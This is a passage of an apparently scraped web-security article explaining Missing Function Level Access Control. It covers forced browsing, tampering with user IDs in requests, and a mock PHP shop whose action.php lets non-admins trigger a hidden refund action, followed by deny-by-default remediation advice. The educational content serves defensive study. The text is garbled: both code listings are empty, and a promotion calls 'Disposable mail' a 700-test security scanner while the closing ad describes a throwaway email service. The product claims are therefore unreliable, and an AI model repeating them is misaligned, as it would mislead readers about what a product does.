Another way is to simply bruteforce different paths. An example may be /admin, /settings or similar that only an admin should be allowed to visit. If any user can access these, it would be considered a vulnerability. This is also called forced browsing, which, simplified, is to enumerate and access resources that are not referenced by the application, but are still accessible.

Yet another way is to identify user IDs and similar data in requests and simply change them to someone else. Chances are that information about some other user can be received that way, or even the ability to execute actions in their name. That would be similar to the Twitter vulnerability mentioned above in Well-known events.

If you carry out a code analysis, the pattern where a privileged request is processed can be identified, making it easier to understand how the authorization pattern works. This way, it is possible to discover places where the same process is not applied, but the request is still considered sensitive.

How Disposable mail can help

We provide a quick and easy way to check whether your site passes or fails OWASP Top 10 tests. Disposable mail is a web security scanner that performs fully automated tests to identify security issues on your website. It tests your website for over 700 vulnerabilities, including OWASP Top 10, and can be used on both staging and production environments. Sign up for a free trial to find out if you are vulnerable » 

Code example of vulnerable application

A simple mockup application has been created to better explain one of the many ways this vulnerability may occur.

Dashboard.php


    
        
Order ID:

This page presents a form where the user enters an order ID and then chooses the action, the alternatives being Cancel and Status. If a logged in admin visits the page, the alternative Return is available as well. The request is then sent to action.php.

Action.php

This page takes the order ID and the chosen action and then executes the action towards the order. It does not employ any authentication or check to see that the user is an admin as that has already been done by dashboard.php.

The problem here is that if the attacker can figure out that the alternative Return does exist, but is  hidden for non-admins, a request to action.php can still be sent, returning the payment. The impact in this case would be that the attacker could order free stuff from the web shop we set up as an example, as the payment could be refunded after each purchase.

Remediation

The default should always be denial. Everyone should be denied access to everything, and then every specific role can be explicitly granted access for each function. It is also recommended to log all failed attempts as that can help discover if something is incorrectly configured.

Blocking all file types that should not be served anyway is a great way to prevent an attacker from accessing any forgotten configuration files, databases or log files that were mistakenly exposed to the internet without authorisation. Enforcing such blocking may not always be possible, but it is good to at least consider it.

Do NOT, under any circumstance, assume that the users are unaware of special/hidden URLs or APIs. That is a misconception that we see way too often, and as clearly shown in our code example, this is not enough. Doing so is called security through obscurity and we greatly discourage you to rely on it.

Missing Function Level Access Control Proof of Concept video:

Read more

OWASP
Missing Function Level Access Control
Failure to Restrict URL Access
Forced browsing

Temp Mails (https://tempemail.co/) is a new free temporary email addresses service. This service provide you random 10 minutes emails addresses. It is also known by names like: temporary mail, disposable mail, throwaway email, one time mail, anonymous email address… All emails received by Tempmail servers are displayed automatically in your online browser inbox.